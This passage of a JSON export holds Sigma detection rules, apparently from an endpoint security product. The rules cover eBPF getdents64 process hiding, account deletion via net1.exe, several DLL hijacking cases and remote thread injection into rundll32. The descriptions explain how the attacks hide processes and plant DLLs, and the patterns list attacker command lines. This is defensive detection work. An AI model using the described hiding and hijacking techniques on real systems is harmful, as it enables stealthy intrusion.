"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619849Z",
"creation_date": "2026-03-23T11:45:34.619851Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619856Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://github.com/pathtofile/bad-bpf/blob/main/src/pidhide.bpf.c",
"https://attack.mitre.org/techniques/T1014/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_process_hiding_via_ebpf.yml",
"content": "title: Process Hiding via eBPF\nid: b9fa1c53-0625-4fe7-8725-9eec7202b1f2\ndescription: |\n Detects an eBPF hook on getdents64, the directory listing syscall that rootkits often exploit to hide processes from user space tools.\n By attaching an eBPF hook to getdents64, the attacker can scan the returned linux_dirent64 entries for the target PID’s /proc/ directory,\n then overwrite the previous directory entry, causing the kernel’s readdir to skip the hidden PID.\n This tricks user space tools (e.g., ls /proc, ps) into never seeing the malicious process.\n It is recommended to check the process which loaded the Extended BPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://github.com/pathtofile/bad-bpf/blob/main/src/pidhide.bpf.c\n - https://attack.mitre.org/techniques/T1014/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2026/01/14\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.t1564.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_attach'\n FunctionHooked|endswith:\n - 'getdents64'\n - 'getdents'\n\n exclusion_bitdefender:\n Image: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b9fa1c53-0625-4fe7-8725-9eec7202b1f2",
"rule_name": "Process Hiding via eBPF",
"rule_description": "Detects an eBPF hook on getdents64, the directory listing syscall that rootkits often exploit to hide processes from user space tools.\nBy attaching an eBPF hook to getdents64, the attacker can scan the returned linux_dirent64 entries for the target PID’s /proc/ directory,\nthen overwrite the previous directory entry, causing the kernel’s readdir to skip the hidden PID.\nThis tricks user space tools (e.g., ls /proc, ps) into never seeing the malicious process.\nIt is recommended to check the process which loaded the Extended BPF program for suspicious activities.\n",
"rule_creation_date": "2026-01-14",
"rule_modified_date": "2026-01-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba164938-e1ed-44bd-9bc1-ec80c8e8824a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621927Z",
"creation_date": "2026-03-23T11:45:34.621929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621934Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/"
],
"name": "t1564_net_delete_account.yml",
"content": "title: User Account Deleted via net.exe\nid: ba164938-e1ed-44bd-9bc1-ec80c8e8824a\ndescription: |\n Detects the deletion of a user account via net1.exe.\n Attackers may delete their accounts to hide their traces on infected systems.\n It is recommended to investigate the parent process and which account was deleted for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_base:\n CommandLine|contains: 'user'\n selection_delete:\n CommandLine|contains:\n - '/delete'\n - '/del'\n - '\\delete'\n - '\\del'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_altiris:\n GrandparentCommandLine|contains: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n CommandLine|contains: '?:\\Windows\\system32\\net1 user /delete'\n\n exclusion_servicenow:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\msiexec.exe|?:\\Windows\\System32\\msiexec.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n CommandLine:\n - '?:\\WINDOWS\\system32\\net1 localgroup /delete ServiceNow Users'\n - '?:\\WINDOWS\\system32\\net1 localgroup Performance Monitor Users servicenow /delete'\n\n exclusion_bmc:\n Ancestors|startswith:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe|'\n - 
'?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxproxy.exe|'\n CommandLine: '?:\\Windows\\system32\\net1 user support /DELETE'\n\n exclusion_pdqdeploy:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-1\\PDQDeployRunner-1.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ivanti:\n Ancestors|endswith: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba164938-e1ed-44bd-9bc1-ec80c8e8824a",
"rule_name": "User Account Deleted via net.exe",
"rule_description": "Detects the deletion of a user account via net1.exe.\nAttackers may delete their accounts to hide their traces on infected systems.\nIt is recommended to investigate the parent process and which account was deleted for suspicious activities.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba29e5c4-618e-4bd4-b9cf-5aa4caf00205",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601622Z",
"creation_date": "2026-03-23T11:45:34.601625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_seanalyzertool.yml",
"content": "title: DLL Hijacking via seanalyzertool.exe\nid: ba29e5c4-618e-4bd4-b9cf-5aa4caf00205\ndescription: |\n Detects potential Windows DLL Hijacking via seanalyzertool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SeAnalyzerToolSA.exe'\n ImageLoaded|endswith: '\\msimg32.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\NETGATE\\'\n - '?:\\Program Files (x86)\\NETGATE\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\NETGATE\\'\n - '?:\\Program Files (x86)\\NETGATE\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Netgate Technologies s.r.o.'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba29e5c4-618e-4bd4-b9cf-5aa4caf00205",
"rule_name": "DLL Hijacking via seanalyzertool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via seanalyzertool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba42bfa6-260e-4950-bcfc-e32a0708078d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087688Z",
"creation_date": "2026-03-23T11:45:34.087690Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087694Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_remote_thread_rundll32.yml",
"content": "title: Remote Thread Created inside RunDLL32 Process\nid: ba42bfa6-260e-4950-bcfc-e32a0708078d\ndescription: |\n Detects the creation of a remote thread inside RunDLL32.\n Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\n RunDLL32 is a target of choice for attackers to hide their malicious activity inside a legitimate process.\n The Cobalt Strike Framework uses this technique to try evade detection.\n It is recommended to investigate the process performing the remote injection to ensure its legitimacy and origin, as well as to look for other suspicious actions on the host.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/04/06\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\rundll32.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_wmi:\n ProcessOriginalFileName: 'WmiPrvSE.exe'\n\n exclusion_svchost:\n ProcessOriginalFileName: 'svchost.exe'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n\n exclusion_windhawk:\n ProcessImage|endswith: '\\windhawk.exe'\n\n exclusion_edpa:\n ProcessImage|endswith:\n - '\\Manufacturer\\Endpoint\\edpa.exe'\n - '\\Manufacturer\\Endpoint Agent\\edpa.exe'\n\n exclusion_ivanti:\n ProcessImage:\n - '*\\Ivanti\\Endpoint\\EPSecurityService.exe'\n - '*\\Ivanti\\Endpoint\\installer\\installer.exe'\n - '*\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgentAssist.exe'\n - 
'?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Inventory\\LDUrlMonInject64.exe'\n - '?:\\Program Files (x86)\\AppSense\\Application Manager\\Agent\\AMDllInjectionAssist.exe'\n\n exclusion_fshoster:\n ProcessImage|endswith:\n - '\\fshoster64.exe'\n - '\\fshoster32.exe'\n\n exclusion_warsaw:\n ProcessImage|endswith:\n - '\\Topaz OFD\\Warsaw\\core.exe'\n - '?:\\Program Files\\Diebold\\Warsaw\\core.exe'\n\n exclusion_flexservice:\n ProcessImage|endswith: '\\Immidio\\Flex Profiles\\FlexService.exe'\n\n exclusion_bitdefender:\n ProcessImage|endswith:\n - '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n - '\\Bitdefender\\Bitdefender Security\\bdservicehost.exe'\n\n exclusion_winrr:\n ProcessImage|endswith: '\\Rush Royale PC\\WinRR.exe'\n\n exclusion_citrix:\n ProcessImage|endswith:\n - '\\Citrix\\ICA Client\\appprotection.exe'\n - '\\Citrix\\ICA Client\\Ctx64Injector64.exe'\n - '\\Citrix\\ICA Client\\entryprotect.exe'\n\n exclusion_dxhook:\n ProcessCommandLine|endswith:\n - '\\rundll32.exe DXCap.dll,DXCap_Hook'\n - '\\rundll32.exe DXCap64.dll,DXCap_Hook'\n\n exclusion_panda_dll:\n ProcessImage:\n - '*\\Panda Security\\WAC\\PSNMVInj.dll'\n - '*\\Panda Security\\WAC\\PSNAEInj64.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n\n exclusion_panda_host:\n ProcessOriginalFileName: 'PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security S.L.'\n\n exclusion_epson:\n ProcessCommandLine|startswith: 'rundll32.exe ?:\\Program Files (x86)\\EPSON Software\\Download Navigator\\\\*.dll,EPGetVersionEx'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_genapi:\n ProcessParentImage|endswith: '\\GenApi.iNot.Client.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'GENAPI'\n\n exclusion_gamemon:\n ProcessImage|endswith:\n - '\\GameMon64.des'\n - '\\GameMon.des'\n ProcessSigned: 'true'\n ProcessSignature: 'INCA Internet Co.,Ltd.'\n\n 
exclusion_adinsight:\n ProcessOriginalFileName: 'ADInsight'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mcafee:\n ProcessOriginalFileName:\n - 'FireSvc.exe'\n - 'fcags.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_rdrleakdiag:\n ProcessOriginalFileName: 'RdrLeakDiag.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_repmgr:\n ProcessImage|endswith: '\\RepMgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Carbon Black, Inc.'\n\n exclusion_MpDlpService:\n ProcessImage|endswith: '\\MpDlpService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bitdefender_installer:\n ProcessImage|endswith: '\\Bitdefender\\Endpoint Security\\installer\\installer.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_teruten:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\TDepend.exe'\n - '?:\\Windows\\SysWOW64\\TDepend64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Teruten, Inc.'\n\n exclusion_roblox:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Roblox\\Versions\\version-????????????????\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n exclusion_fsecure:\n ProcessImage: '?:\\Program Files (x86)\\F-Secure\\Client Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'WithSecure Oyj'\n\n exclusion_tiworker:\n ProcessImage|endswith: '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba42bfa6-260e-4950-bcfc-e32a0708078d",
"rule_name": "Remote Thread Created inside RunDLL32 Process",
"rule_description": "Detects the creation of a remote thread inside RunDLL32.\nAdversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\nRunDLL32 is a target of choice for attackers to hide their malicious activity inside a legitimate process.\nThe Cobalt Strike Framework uses this technique to try to evade detection.\nIt is recommended to investigate the process performing the remote injection to ensure its legitimacy and origin, as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba55f6d5-4886-41fb-8312-c31e6b6e4c24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602696Z",
"creation_date": "2026-03-23T11:45:34.602700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602708Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_extrac32.yml",
"content": "title: DLL Hijacking via extrac32.exe\nid: ba55f6d5-4886-41fb-8312-c31e6b6e4c24\ndescription: |\n Detects potential Windows DLL Hijacking via extrac32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'extrac32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba55f6d5-4886-41fb-8312-c31e6b6e4c24",
"rule_name": "DLL Hijacking via extrac32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via extrac32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba7f10ac-1480-4b45-817d-16cce2cfb0a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588204Z",
"creation_date": "2026-03-23T11:45:34.588207Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588215Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winsxs_binary.yml",
"content": "title: WinSxS Binary Loaded Suspicious DLL\nid: ba7f10ac-1480-4b45-817d-16cce2cfb0a4\ndescription: |\n Detects potential Windows DLL Hijacking using a WinSxS binary.\n DLL hijacking usually takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers discovered a vulnerability in the Windows search order when using binaries located in the WinSxS system folder.\n If a WinSxS binary is called from a current working directory containing a missing DLL, the binary will load the DLL planted by the attacker.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/01/03\nmodified: 2025/09/01\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessImage|startswith: '?:\\Windows\\WinSxS\\'\n ProcessCommandLine|contains: '\\Windows\\WinSxS\\'\n ImageLoaded|endswith:\n - '\\ClipUp.exe'\n - '\\route.exe'\n - '\\mcbuilder.exe'\n - '\\cmd.exe'\n - '\\ipconfig.exe'\n - '\\systeminfo.exe'\n - '.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n - '\\Windows\\SysWOW64\\'\n - '\\Windows\\System32\\'\n - '\\Windows\\WinSxS\\'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Acronis International GmbH'\n - 'Adobe Inc.'\n - 
'Apple Inc.'\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n - 'Bitdefender srl'\n - 'Broadcom Corporation'\n - 'Broadcom Inc'\n - 'Cybereason inc.'\n - 'Cybereason, inc'\n - 'Cylance, Inc.'\n - 'Deep Instinct LTD'\n - 'Devicelock, inc'\n - 'Digitalpersona, inc.'\n - 'Dropbox, Inc'\n - 'Dynatrace LLC'\n - 'ESET, spol. s r.o.'\n - 'F-Secure Corporation'\n - 'Fortinet Technologies (Canada) ulc'\n - 'G DATA CyberDefense AG'\n - 'Glavsoft llc.'\n - 'HarfangLab SAS'\n - 'Ivanti, Inc.'\n - 'Kaspersky Lab Jsc'\n - 'Kaspersky Lab'\n - 'McAfee Test'\n - 'Mcafee, inc.'\n - 'Mcafee, llc'\n - 'Michael Maltsev' # Windhawk\n - 'Microsoft Corporation'\n - 'Microsoft Windows Hardware Compatibility Publisher'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Musarubra us llc'\n - 'national instruments corporation'\n - 'Notepad++'\n - 'NVIDIA Corporation PE Sign v2014'\n - 'NVIDIA Corporation'\n - 'Oracle America, Inc.'\n - 'Panda Security s.l.'\n - 'Sassafras Software Inc.'\n - 'Sophos Limited'\n - 'Sophos Ltd'\n - 'Symantec Corporation'\n - 'teamviewer germany gmbh'\n - 'Trend Micro, Inc.'\n - 'Vmware, Inc.'\n - 'Withsecure oyj'\n\n exclusion_explorer:\n ProcessImage:\n - '?:\\Windows\\winsxs\\x86_microsoft-windows-explorer_*\\explorer.exe'\n - '?:\\Windows\\winsxs\\x64_microsoft-windows-explorer_*\\explorer.exe'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack*\\TiWorker.exe -Embedding'\n\n # Werfault loads the image and some DLLs of a crashing program\n exclusion_werfault:\n ProcessOriginalFileName: 'WerFault.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains:\n - ' -u -p'\n - ' Global\\'\n\n # Runonce loads the image of the executable to launch\n exclusion_runonce:\n ProcessOriginalFileName: 'RUNONCE.EXE'\n\n exclusion_regsvr32:\n 
